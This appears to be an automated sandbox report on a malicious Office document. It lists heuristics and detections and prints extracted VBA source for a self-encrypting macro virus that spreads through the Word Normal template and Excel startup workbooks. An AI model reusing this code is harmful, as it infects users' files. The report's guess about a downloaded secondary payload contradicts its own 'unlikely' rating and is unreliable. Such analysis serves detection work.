Risk Score: 420 (MALICIOUS)

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File

Malware Insights
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The VBA code also contains obfuscated logic that decrypts and executes further code, likely to download and run a secondary payload. This is further supported by ClamAV detections of 'Doc.Trojan.Codefore-1' and 'Doc.Trojan.Weete-1'.
Heuristics (9)
- ClamAV: Doc.Trojan.Codefore-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Codefore-1
- VBA macros detected (medium, 6 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10450 bytes |

SHA-256: 4ba2865812bebb1932d46517474a58839294f0e747262d99b60cb7ded236cf8a
Detection: ClamAV: Doc.Trojan.Weete-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Function c(s, k)
For l = 1 To Len(s): c = c & Chr(Asc(Mid(s, l, 1)) Xor k): Next
End Function
Private Sub Document_Open()
For b = 1 To 136: If Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(b, 1), 1, 1) = Chr(39) Then ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine b, c(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(b, 1), 2), Val(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(140, 1), 2))) & Chr(39)
Next: w
End Sub
Private Sub Document_Close(): Document_Open: End Sub
Private Sub Workbook_Open()
For b = 1 To 136: If Mid(ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(b, 1), 1, 1) = Chr(39) Then ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.ReplaceLine b, c(Mid(ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(b, 1), 2), Val(Mid(ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(140, 1), 2))) & Chr(39)
Next: e
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean): Workbook_Open: End Sub
Private Sub w()
On Error Resume Next: st: bss '
Randomize: Set o = ThisDocument.VBProject.VBComponents(1).CodeModule '
o.ReplaceLine 140, Chr(39) & (211 + Int(Rnd * 39)) '
For l = 1 To 136 '
If Right(o.Lines(l, 1), 1) = Chr(39) Then o.ReplaceLine l, Left(Chr(39) & c(o.Lines(l, 1), Val(Mid(o.Lines(140, 1), 2))), Len(o.Lines(l, 1)) - 1) '
Next '
If ThisDocument = ActiveDocument Then Set h = NormalTemplate Else Set h = ActiveDocument '
With h.VBProject.VBComponents(1).CodeModule '
If .Lines(1, 1) <> "Private Function c(s, k)" Then '
.deletelines 1, .countoflines '
.InsertLines 1, o.Lines(1, 141) '
If h = ActiveDocument And ActiveDocument.Path <> "" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument '
End If '
End With '
ThisDocument.Save '
Set x = GetObject(, "excel.application") '
If x = "" Then Set x = CreateObject("excel.application"): q = True '
If UCase(Dir(x.Application.StartupPath & "\Mappe.")) <> "MAPPE" Then '
Set b = x.Workbooks.Add '
b.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.InsertLines 1, o.Lines(1, 141) '
j = "Cause it's a bitter sweet symphony that's life" '
b.SaveAs x.Application.StartupPath & "\Mappe.": b.Close '
End If '
If q = True Then x.Quit '
End Sub
Private Sub e()
On Error Resume Next: st: bst '
Randomize: Set o = ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule '
o.ReplaceLine 140, Chr(39) & (211 + Int(Rnd * 39)) '
For l = 1 To 136 '
If Right(o.Lines(l, 1), 1) = Chr(39) Then o.ReplaceLine l, Left(Chr(39) & c(o.Lines(l, 1), Val(Mid(o.Lines(140, 1), 2))), Len(o.Lines(l, 1)) - 1) '
Next '
If UCase(Dir(Application.StartupPath & "\Mappe.")) <> "MAPPE" Then Workbooks.Add.SaveAs Application.StartupPath & "\Mappe." '
For Each t In Workbooks '
If t.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(1, 1) <> "Private Function c(s, k)" Then '
t.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.deletelines 1, t.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.countoflines '
t.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(1, 141) '
If t.Path <> "" Then t.Save Else t.SaveAs t.FullName '
End If '
Next '
ThisWorkbook.Save '
Set x = GetObject(, "word.application") '
If x = "" Then Set x = CreateObject("word.application"): q = True '
If x.NormalTemplate.VB
```

... (truncated)